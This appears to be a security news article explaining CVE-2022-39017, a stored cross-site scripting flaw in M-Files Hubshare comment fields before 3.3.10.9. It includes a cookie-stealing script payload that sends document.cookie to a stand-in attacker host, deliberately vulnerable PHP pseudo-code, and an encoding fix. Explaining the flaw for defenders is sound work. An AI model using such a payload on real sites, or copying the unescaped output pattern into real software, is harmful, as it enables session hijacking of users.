CVE CyberSecurity Database News

CVE-2022-39017 - How a Simple Comment Could Hack M-Files Hubshare (Before 3.3.10.9)

Poster -

When we think about dangerous security vulnerabilities, we may imagine hackers breaking deep into servers, exploiting obscure processor bugs, or coming up with wild attacks that only exist in Hollywood. But sometimes, it takes only bad input validation and a comment box to create big trouble. That’s exactly what happened in M-Files Hubshare, a popular platform for collaboration, before version 3.3.10.9 — all thanks to CVE-2022-39017.

In this article, you’ll learn how this vulnerability works, see actual code samples, and know what you can do if your system is at risk. Let’s break it down in straightforward language.

What is M-Files Hubshare?

M-Files Hubshare is a sharing and collaboration solution that lets companies manage content and communication. It has features like document sharing, chat, and, of course, commenting across various items.

What is CVE-2022-39017?

CVE-2022-39017 is a vulnerability discovered in all comment fields of M-Files Hubshare before version 3.3.10.9.

Affected Area: All comment fields

- Impact: Lets authenticated users (so, people with a login) inject cross-site scripting (XSS) payloads with comments

What Causes the Bug?

What went wrong is that user input inside comments was not sanitized (cleaned) and not properly encoded for HTML output. That means if someone leaves a comment with JavaScript or HTML code, the site would show that code just as it is, instead of treating it as plain text.

When you leave a comment like

Great job, team!

The platform displays

Great job, team!

Instead, an attacker leaves this script

<script>alert('XSS')</script>

If the comment is not cleaned or encoded, the page will render the SCRIPT tag as actual HTML/JavaScript. Anyone loading the comment will see an alert pop-up. Of course, malicious hackers often do something way nastier — like stealing your cookies or session tokens.

Exploit Code: The Malicious Comment

<script>
    fetch('https://attacker.site/steal?cookie='; + document.cookie);
</script>

This snippet grabs the browser cookie (which may include session info) and sends it to a server controlled by the attacker. Your account could be hijacked with one comment.

Here’s a fake but typical example of how the backend might process comments

// Vulnerable pseudo-code (for illustration only)
$comment = $_POST['comment'];
// No sanitization or encoding!
echo "<div class='comment'>$comment</div>";

This code just *dumps* what the user wrote straight into the HTML output. Ouch.

Input Validation: Reject or filter dangerous code before saving the comment.

2. Output Encoding: Convert special HTML characters (<, >, &, etc.) to their safe equivalents when displaying.

Example fix in PHP style

// Simple fix: HTML-encode before showing in browser
$comment = $_POST['comment'];
$safe_comment = htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');
echo "<div class='comment'>$safe_comment</div>";

Now, <script> will show up as plain text, not as executable code.

Steal session cookies

- Deface screens (insert images/hacks)

References

- Official M-Files Security Advisory
- CVE Details: CVE-2022-39017
- OWASP XSS (Cross Site Scripting) Cheat Sheet
- What is Output Encoding?

Conclusion

CVE-2022-39017 is a classic web app bug: forgetting about input and output safety. But with collaboration platforms like Hubshare, even a regular user could turn the simplest comment box into a launching pad for attacks.

If you are an admin for M-Files Hubshare:  
Upgrade now and double-check your output encoding everywhere users write text. Don't wait for someone to prove this bug is real — it’s already public.

Stay safe!

*Exclusive post by your cybersecurity guide. Please do not reproduce without credit.*

Timeline

Published on: 10/31/2022 21:15:00 UTC
Last modified on: 11/01/2022 19:47:00 UTC